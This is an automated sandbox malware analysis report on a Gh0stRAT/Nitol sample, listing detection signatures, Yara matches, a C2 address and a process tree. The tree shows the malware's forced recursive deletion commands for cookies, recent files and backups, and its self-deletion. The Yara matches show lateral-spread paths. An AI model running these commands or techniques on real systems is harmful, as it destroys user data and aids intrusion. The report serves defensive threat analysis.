Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
G3izWAY3Fa.exe

Overview

General Information

Sample name:G3izWAY3Fa.exe
renamed because original name is a hash value
Original sample name:118F7F61B6AFB1DA5E94EA1740222C73.exe
Analysis ID:1579781
MD5:118f7f61b6afb1da5e94ea1740222c73
SHA1:5a0d66ec18cdb3812bad259999cf64d051cefa8b
SHA256:aaf88339c23080ffd423da3b03a229d220b55c5e007c1f413fbd3633c48aad44
Tags:exeGh0stRATuser-abuse_ch
Infos:

Detection

GhostRat, Nitol
Score:78
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
AI detected suspicious sample
Checks if browser processes are running
Contain functionality to detect virtual machines
Contains functionality to capture and log keystrokes
Contains functionality to detect sleep reduction / modifications
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to enumerate network shares of other devices
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Machine Learning detection for dropped file
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Desusertion Ports
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • G3izWAY3Fa.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\G3izWAY3Fa.exe" MD5: 118F7F61B6AFB1DA5E94EA1740222C73)
    • v5.exe (PID: 7696 cmdline: "C:\Windows\temp\v5.exe" MD5: 48A02F4A003E8CBE683CF5DADA237168)
      • cmd.exe (PID: 7820 cmdline: "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • server.exe (PID: 7708 cmdline: "C:\Windows\temp\server.exe" MD5: 8A953A49796B7F8C7539A6B2BC175397)
    • .exe (PID: 7740 cmdline: "C:\Windows\temp\ .exe" MD5: CCEE0912E79D434F0D2C1E11274F23C0)
      • cmd.exe (PID: 8060 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8076 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8100 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8140 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8188 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7252 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2716 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4220 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7800 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7764 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7788 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7640 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7692 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1912 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3556 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1528 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3360 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3124 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3108 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3248 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5508 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4436 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7672 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4680 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7276 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6492 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7336 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2804 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5808 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5440 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5244 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6556 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5308 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5972 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5356 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6216 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6700 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7004 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5652 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2052 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1868 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3376 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7836 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3600 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6996 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1604 cmdline: "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • v5.exe (PID: 7720 cmdline: C:\Windows\temp\v5.exe MD5: 48A02F4A003E8CBE683CF5DADA237168)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_GhostRatYara detected GhostRatJoe Security
    dump.pcapgh0stunknownhttps://github.com/jackcr/
    • 0x3a2d1:$a: 47 68 30 73 74 A7 00 00 00 18 01 00 00 78 9C
    • 0x3d203:$a: 47 68 30 73 74 16 00 00 00 01 00 00 00 78 9C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
        00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmpgh0stunknownhttps://github.com/jackcr/
          • 0x0:$a: 47 68 30 73 74 A7 00 00 00 18 01 00 00 78 9C
          00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmpJoeSecurity_NitolYara detected NitolJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.v5.exe.400000.0.unpackJoeSecurity_NitolYara detected NitolJoe Security
              4.2.v5.exe.400000.0.unpackBackdoor_Nitol_Jun17Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre DownloaderFlorian Roth
              • 0x1e13:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
              • 0x1eb0:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
              • 0x203b:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
              • 0x21a3:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
              • 0x1b60:$s2: %c%c%c%c%c%c.exe
              • 0x2003:$s5: Accept-Language: zh-cn
              • 0x216b:$s5: Accept-Language: zh-cn
              • 0x22cf:$s5: Accept-Language: zh-cn
              4.2.v5.exe.400000.0.unpackZxShell_Related_Malware_CN_Group_Jul17_2Detects a ZxShell related sample from a CN threat groupFlorian Roth
              • 0x1e13:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
              • 0x1eb0:$u1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
              • 0x203b:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
              • 0x21a3:$u2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
              • 0x1cf0:$u3: User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
              • 0x2307:$u4: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
              • 0x172c:$x1: \\%s\admin$\g1fd.exe
              • 0x1764:$x2: C:\g1fd.exe
              • 0x174c:$x3: \\%s\C$\NewArean.exe
              • 0x17d0:$s0: at \\%s %d:%d %s
              • 0x19f0:$s1: %c%c%c%c%ccn.exe
              • 0x1a58:$s1: %c%c%c%c%ccn.exe
              • 0x1ad4:$s1: %c%c%c%c%ccn.exe
              • 0x1970:$s2: hra%u.dll
              • 0x1b20:$s2: hra%u.dll
              • 0x1b54:$s2: hra%u.dll
              • 0x1d61:$s3: Referer: http://%s:80/http://%s
              • 0x2003:$s5: Accept-Language: zh-cn
              • 0x216b:$s5: Accept-Language: zh-cn
              • 0x22cf:$s5: Accept-Language: zh-cn
              4.2.v5.exe.400000.0.unpackCN_disclosed_20180208_Mal1Detects malware from disclosed CN malware setFlorian Roth
              • 0x2307:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
              4.2.v5.exe.400000.0.unpackMAL_Nitol_Malware_Jan19_1Detects Nitol MalwareFlorian Roth
              • 0x239c:$xc2: GET ^&&%$%$^
              • 0x23cd:$xc2: GET ^&&%$%$^
              • 0x23fe:$xc2: GET ^&&%$%$^
              • 0x242f:$xc2: GET ^&&%$%$^
              • 0x2460:$xc2: GET ^&&%$%$^
              • 0x2491:$xc2: GET ^&&%$%$^
              • 0x24c2:$xc2: GET ^&&%$%$^
              • 0x24f3:$xc2: GET ^&&%$%$^
              • 0x2524:$xc2: GET ^&&%$%$^
              • 0x2555:$xc2: GET ^&&%$%$^
              • 0x2586:$xc2: GET ^&&%$%$^
              • 0x25b7:$xc2: GET ^&&%$%$^
              • 0x25e8:$xc2: GET ^&&%$%$^
              • 0x2619:$xc2: GET ^&&%$%$^
              • 0x264a:$xc2: GET ^&&%$%$^
              • 0x267b:$xc2: GET ^&&%$%$^
              • 0x26ac:$xc2: GET ^&&%$%$^
              • 0x26dd:$xc2: GET ^&&%$%$^
              • 0x270e:$xc2: GET ^&&%$%$^
              • 0x273f:$xc2: GET ^&&%$%$^
              • 0x23c9:$n1: .htmGET
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Double Extension File Execution
              Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\temp\ .exe" , CommandLine: "C:\Windows\temp\ .exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Temp\ .exe, NewProcessName: C:\Windows\Temp\ .exe, OriginalFileName: C:\Windows\Temp\ .exe, ParentCommandLine: "C:\Users\user\Desktop\G3izWAY3Fa.exe", ParentImage: C:\Users\user\Desktop\G3izWAY3Fa.exe, ParentProcessId: 7620, ParentProcessName: G3izWAY3Fa.exe, ProcessCommandLine: "C:\Windows\temp\ .exe" , ProcessId: 7740, ProcessName: .exe
              Sigma detected: Communication To Uncommon Desusertion Ports
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 120.48.34.233, DesusertionIsIpv6: false, DesusertionPort: 8080, EventID: 3, Image: C:\Windows\Temp\v5.exe, Initiated: true, ProcessId: 7720, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49723
              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
